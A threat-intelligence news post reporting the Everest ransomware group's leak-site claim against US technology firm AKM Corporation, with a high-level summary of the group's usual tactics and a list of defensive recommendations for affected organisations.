On May 28, 2026, the Everest ransomware group claimed responsibility for a cyberattack against AKM Corporation (akmcorp.com), a US-based technology firm. The threat actors have publicly threatened to release sensitive corporate data unless a ransom is paid, marking another high-profile victim in Everest's expanding 2026 campaign.
What Happened
Everest added AKM Corporation to its dark web leak site on May 28, 2026, accompanied by a statement reading: "The full leak will be published soon, unless a company representative contacts us via the channels provided." The posting follows Everest's established double-extortion playbook, where data exfiltration precedes or accompanies encryption, giving operators leverage even against victims with viable backups. AKM Corporation, a technology firm headquartered in the United States, has not yet issued a public response to the claim, and the volume of stolen data has not been confirmed.
What Was Taken
Everest's listing references "sensitive corporate data" without itemizing specific datasets at the time of posting. Based on the group's historical operating pattern, exfiltrated material typically includes internal corporate documents, employee records, financial files, client information, source code, and credential stores. For a technology firm, the exposure surface is particularly acute: intellectual property, customer environments, API keys, and SaaS tenant data are all plausible targets. A sample drop is expected before any full leak, consistent with the group's pressure tactics.
Why It Matters
Everest has steadily climbed the ransomware ecosystem since pivoting from pure encryption to data-broker tactics, frequently selling access to other affiliates when victims refuse to pay. A breach at a US technology company introduces downstream supply chain risk: AKM's customers, partners, and integrated vendors may face secondary exposure through stolen credentials, configuration data, or embedded access tokens. Defenders monitoring third-party risk should treat any AKM relationship as elevated until scope is clarified.
The Attack Technique
Initial access vectors have not been disclosed. Everest affiliates have historically relied on valid account compromise sourced from infostealer logs, exploitation of unpatched edge devices (VPN concentrators, firewalls, file transfer appliances), and phishing payloads delivering loader malware. Post-access, the group typically deploys living-off-the-land tooling, abuses RMM software for persistence, and uses Rclone or MEGA clients for bulk exfiltration before detonating ransomware. Organizations should assume credential theft preceded the intrusion by weeks.
What Organizations Should Do
- Hunt for Everest indicators: Search EDR and SIEM telemetry for known Everest TTPs, including unauthorized Rclone usage, suspicious PowerShell encoded commands, and scheduled tasks linked to lateral movement.
- Rotate exposed credentials: Any organization with a vendor relationship to AKM Corporation should rotate shared secrets, API keys, and federated access tokens as a precaution.
- Validate offline backups: Confirm immutable, air-gapped backups are current and successfully restorable. Test recovery against ransomware-specific scenarios.
- Enforce MFA on all external access: Especially on VPN, RDP, email, and identity provider portals. Phishing-resistant MFA (FIDO2) should be prioritized for privileged accounts.
- Monitor dark web exposure: Track Everest's leak site for sample drops and scan infostealer marketplaces for credentials tied to AKM domains and partner accounts.
- Engage incident response counsel early: Legal, regulatory, and negotiation considerations should be coordinated before any contact with the threat actor, particularly given OFAC and disclosure obligations.
Sources: Everest Ransomware Strikes AKM Corporation - DeXpose